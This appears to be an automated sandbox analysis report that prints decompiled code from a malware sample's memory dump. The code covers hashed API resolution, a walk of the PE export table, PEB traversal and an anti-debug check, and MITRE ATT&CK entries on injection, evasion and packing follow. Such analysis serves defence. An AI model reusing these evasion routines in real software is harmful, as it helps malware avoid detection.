Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction ID: c9d936b9ab4abfd864511878f83208f4637e90a797bbc22e27ea9e50c0a61393
Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction Fuzzy Hash: DC1261715083499FC754DFA8C990A9FB7E9BF95304F604D2DE9A9972A0EB30ED04CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6E8914D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E8914D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E8903A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e89d208 == 0 ||  *0x6e89d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E894BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e89d2ec |  *0x6e89d2ed;
									if(( *0x6e89d2ec |  *0x6e89d2ed) == 0) {
										_t525 =  *0x6e89d208; // 0x4811340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e89d2ec = 1;
											_t526 = E6E893558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E891CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e89d208 = _t526;
											 *0x6e89d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E893558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E891CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E88E070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E88E070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x6e89d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x6e89d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E88E94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E892F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e89d2e4 = 1;
					E6E88F620( &(_t535[0x38]), 0);
					E6E88F620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E88F558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E892F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E88F8C4( &(_t535[0xc]), E6E88F568( &(_t535[8])) + 0x14);
								_t369 = E6E88F558( &(_t535[0xc]), E6E88F568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E88F6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E88F620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E88F6F0( &(_t535[8]));
							E6E88F6F0( &(_t535[0x164]));
							E6E88F620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E88F620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E6E891DD0(0xa5eabdf8);
							_t290 = E6E891388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E891D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E6E88D0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E895C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E895C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E898D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E88F6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E88BC00( &(_t535[0x110]));
							}
							E6E88D098( &(_t535[0x104]));
							E6E88D098(_t518);
							E6E88D098( &(_t535[0x15c]));
							E6E88D098( &(_t535[0x154]));
							E6E899058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E88F6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E89901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E88F558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E88F568( &(_t535[0x44]));
								_t519 =  *(0x6e89bce0 + _t381 * 4);
								_t531 = E6E898FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E898754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E88F568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E88F578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E88F568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E88F8C4( &(_t535[0x20]), E6E88F568( &(_t535[0x1c])) + 8);
										E6E88F558( &(_t535[0x20]), E6E88F568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E8930A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E88F8C4( &(_t535[0x48]), _t535[0x70]);
									E6E8930A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E88F8DC( &(_t535[0x44]), _t563);
									E6E88F8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E8990A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E899070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E88F6F0( &(_t535[0x144]));
									E6E88F6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e89d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E88F6F0( &(_t535[0x11c]));
							E6E898DD4(_t381,  &(_t535[0xd8]));
							E6E88F6F0( &(_t535[0x1c]));
							E6E88F6F0( &(_t535[0x44]));
							E6E88F6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E88F558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E88F8C4( &(_t535[0x38]), E6E88F568( &(_t535[0x34])) + 0x14);
							_t347 = E6E88F558( &(_t535[0x38]), E6E88F568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E88F558( &(_t535[0xc]), _t62);
						_t455 = E6E88F558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e8914e4
0x6e8914eb
0x6e8914ee
0x6e8914f5
0x6e891c77
0x6e891c77
0x6e8914fb
0x6e891506
0x6e891a45
0x6e891a49
0x00000000
0x6e891cc8
0x6e891a4f
0x6e891a52
0x6e891a55
0x6e891a5f
0x6e891a6e
0x6e891a70
0x6e891a77
0x6e891c61
0x6e891c63
0x6e891c66
0x6e891c6a
0x00000000
0x6e891c6a
0x6e891a86
0x6e891a91
0x6e891a98
0x6e891a9b
0x6e891a9d
0x6e891aa0
0x6e891aa3
0x6e891aa9
0x6e891ab7
0x6e891ac7
0x6e891aec
0x6e891afd
0x6e891b00
0x6e891b02
0x6e891b66
0x6e891b69
0x6e891b69
0x6e891b6b
0x6e891b6e
0x6e891b72
0x6e891b72
0x6e891b76
0x00000000
0x00000000
0x6e891b83
0x6e891b89
0x6e891bbd
0x6e891bc3
0x6e891bc5
0x6e891c94
0x6e891c9c
0x6e891c9f
0x6e891ca1
0x6e891cb8
0x6e891cb8
0x6e891ca3
0x6e891ca7
0x6e891cac
0x6e891cac
0x6e891cba
0x6e891cc0
0x6e891bdf
0x6e891bdf
0x6e891be1
0x6e891be1
0x6e891be3
0x6e891be3
0x6e891be8
0x00000000
0x00000000
0x6e891bea
0x6e891beb
0x6e891bee
0x6e891bf1
0x00000000
0x00000000
0x6e891bfd
0x6e891c00
0x6e891c02
0x6e891c19
0x6e891c19
0x6e891c04
0x6e891c08
0x6e891c0d
0x6e891c0d
0x6e891c26
0x6e891c29
0x6e891c32
0x6e891c35
0x6e891c58
0x6e891c5c
0x00000000
0x6e891c5c
0x6e891c3d
0x6e891c3d
0x6e891c49
0x6e891c4c
0x6e891c55
0x00000000
0x6e891c55
0x6e891bcb
0x6e891bdb
0x6e891bdb
0x6e891bdd
0x00000000
0x00000000
0x6e891bd3
0x6e891bd5
0x6e891bd5
0x00000000
0x6e891bdb
0x6e891b8b
0x6e891b93
0x6e891bb3
0x6e891b95
0x6e891b95
0x6e891b9d
0x6e891ba6
0x6e891ba6
0x6e891b9d
0x00000000
0x6e891b93
0x6e891b04
0x6e891b0b
0x00000000
0x00000000
0x6e891b18
0x6e891b1e
0x6e891b23
0x6e891b2a
0x6e891b2e
0x6e891b43
0x6e891b45
0x6e891b47
0x6e891b4d
0x6e891b5b
0x6e891b5b
0x6e891b61
0x00000000
0x6e891b61
0x00000000
0x00000000
0x00000000
0x00000000
0x6e891aab
0x6e891aab
0x6e891aab
0x6e891aac
0x6e891aaf
0x6e891ab3
0x00000000
0x6e891ac9
0x6e891acc
0x6e891acf
0x6e891ad8
0x6e891adb
0x6e891adc
0x6e891ade
0x00000000
0x6e891519
0x6e89151b
0x6e891520
0x6e89152b
0x6e891539
0x6e89154c
0x6e891559
0x6e891562
0x6e891566
0x6e89156a
0x6e8915b2
0x6e8915b2
0x6e8915b4
0x6e8915bb
0x00000000
0x00000000
0x6e8915d4
0x6e8915dc
0x6e8915e0
0x6e8915f5
0x6e8915f9
0x6e8915fd
0x6e891606
0x6e89160c
0x6e89160f
0x6e891613
0x6e89161b
0x6e89161d
0x6e891621
0x6e891628
0x6e891631
0x6e891631
0x6e891635
0x6e89164a
0x6e891660
0x6e89166d
0x6e89166e
0x6e89166e
0x6e891670
0x00000000
0x00000000
0x00000000
0x00000000
0x6e89162a
0x6e89162a
0x6e89162a
0x6e89162b
0x6e89162c
0x00000000
0x6e89162a
0x6e8915ef
0x6e8915f3
0x00000000
0x00000000
0x00000000
0x6e891674
0x6e891674
0x6e891675
0x6e891678
0x6e891682
0x6e891682
0x6e891686
0x6e89168d
0x6e8916e8
0x6e8916ed
0x6e891740
0x6e891740
0x6e891744
0x6e891748
0x6e891572
0x6e891575
0x6e89157a
0x6e891580
0x6e891583
0x6e89158a
0x6e89158e
0x6e891595
0x6e89159e
0x6e8915a2
0x6e8915a6
0x6e8915ac
0x00000000
0x00000000
0x00000000
0x6e8915ac
0x6e891752
0x6e89175e
0x6e891769
0x6e891770
0x6e891779
0x6e891783
0x6e891784
0x6e891792
0x6e891797
0x6e891798
0x6e8917a5
0x6e8917aa
0x6e8917bc
0x6e8917c1
0x6e8917c6
0x6e8917d8
0x6e8917ea
0x6e8917ef
0x6e8917fa
0x6e891801
0x6e891806
0x6e89180e
0x6e891817
0x6e891817
0x6e891823
0x6e89182a
0x6e891836
0x6e891842
0x6e891850
0x6e891861
0x6e891868
0x6e89186d
0x6e891876
0x6e89187b
0x6e89187d
0x6e891881
0x6e891885
0x6e891892
0x6e89189f
0x6e8918a3
0x6e8918b7
0x6e8918bb
0x00000000
0x00000000
0x6e8918d0
0x6e8918d2
0x6e8918da
0x6e8918d7
0x6e8918d7
0x6e8918d7
0x6e8918de
0x6e8918e0
0x6e8918e6
0x6e8918ec
0x6e891948
0x6e891951
0x6e891955
0x6e891962
0x6e89196b
0x6e891970
0x6e891974
0x6e891977
0x6e8919d8
0x6e8919ee
0x6e8919f9
0x6e8919fa
0x6e8919fb
0x6e8919ff
0x6e891a02
0x6e891c82
0x6e891c85
0x6e891c85
0x00000000
0x6e891a02
0x6e891981
0x6e891991
0x6e89199a
0x6e8919a3
0x6e8919ac
0x6e8919ad
0x6e8919ae
0x6e8919b3
0x6e8919bb
0x6e8919c3
0x00000000
0x00000000
0x00000000
0x6e8919c5
0x6e8918f5
0x6e8918fa
0x6e8918fe
0x6e8918fe
0x6e891902
0x6e891905
0x00000000
0x00000000
0x6e891926
0x6e891928
0x6e89192c
0x6e89192e
0x00000000
0x00000000
0x6e891930
0x6e891937
0x6e891943
0x00000000
0x6e891943
0x6e89190a
0x00000000
0x6e891a08
0x6e891a08
0x6e891a09
0x6e891a19
0x6e891a25
0x6e891a2e
0x6e891a37
0x6e891a40
0x00000000
0x6e891a40
0x6e8916ef
0x6e8916f1
0x6e8916f3
0x6e8916f8
0x6e8916fd
0x6e891710
0x6e891726
0x6e89172f
0x6e891730
0x6e891730
0x6e891732
0x6e891733
0x6e891736
0x6e89173a
0x00000000
0x6e8916f3
0x6e89168f
0x6e891699
0x6e89169a
0x6e89169a
0x6e8916a7
0x6e8916b3
0x6e8916b5
0x6e8916b7
0x6e8916bb
0x6e8916cb
0x6e8916cb
0x6e8916d2
0x6e8916d5
0x6e8916d6
0x6e8916da
0x6e8916e4
0x00000000
0x6e8916e4

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f157a9510f46ea5e1a34dc203c038cc99dde866320f32647163c6c0ed19d941e
Instruction ID: ef299e1f1cdc1a5b00fe66fed02d814857852664dcb6c89b86bf55aabffc3b4f
Opcode Fuzzy Hash: f157a9510f46ea5e1a34dc203c038cc99dde866320f32647163c6c0ed19d941e
Instruction Fuzzy Hash: 3C327B709083459FC714DFACC890A9FB7E8BF95308F614D2DE895872A1EB30E949DB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E886DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E886DC8() {

				 *0x6e89d280 = GetUserNameW;
				 *0x6E89D284 = MessageBoxW;
				 *0x6E89D288 = GetLastError;
				 *0x6E89D28C = CreateFileA;
				 *0x6E89D290 = DebugBreak;
				 *0x6E89D294 = FlushFileBuffers;
				 *0x6E89D298 = FreeEnvironmentStringsA;
				 *0x6E89D29C = GetConsoleOutputCP;
				 *0x6E89D2A0 = GetEnvironmentStrings;
				 *0x6E89D2A4 = GetLocaleInfoA;
				 *0x6E89D2A8 = GetStartupInfoA;
				 *0x6E89D2AC = GetStringTypeA;
				 *0x6E89D2B0 = HeapValidate;
				 *0x6E89D2B4 = IsBadReadPtr;
				 *0x6E89D2B8 = LCMapStringA;
				 *0x6E89D2BC = LoadLibraryA;
				 *0x6E89D2C0 = OutputDebugStringA;
				return 0x6e89d280;
			}

0x6e886dd9
0x6e886de1
0x6e886de4
0x6e886df3
0x6e886df6
0x6e886e05
0x6e886e08
0x6e886e17
0x6e886e1a
0x6e886e29
0x6e886e2c
0x6e886e3b
0x6e886e3e
0x6e886e4d
0x6e886e50
0x6e886e5f
0x6e886e62
0x6e886e65

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82acbddf0c186f831900e6c9b8425c6c2c98bc9530dc87bb8dc621101c85050f
Instruction ID: 88ceadb1c41ee3f1a6360953d47a4432e2e49a073b22e5bae3abc5c1126d908b
Opcode Fuzzy Hash: 82acbddf0c186f831900e6c9b8425c6c2c98bc9530dc87bb8dc621101c85050f
Instruction Fuzzy Hash: 8C11E8B8E15A10CF8B48CF0ED190851BBF2BB8E31035282EAD80D8B366D734E845DF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E88BC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E88BC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6E88C33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E6E892F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x6e88bc01
0x6e88bc03
0x6e88bc0a
0x6e88bc29
0x6e88bc2a
0x6e88bc0c
0x6e88bc16
0x6e88bc1d
0x6e88bc23
0x00000000
0x6e88bc1f
0x6e88bc1f
0x6e88bc21
0x6e88bc22
0x6e88bc22
0x6e88bc1d

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: c662f2cfce3888758b876202588f8db9294b4a704cafbc1a1f82e266f36bd502
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: B0D0127610414367EF5517FDBD00B57E79D4FD2155F140D5A9D006B09ECFA680525121

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

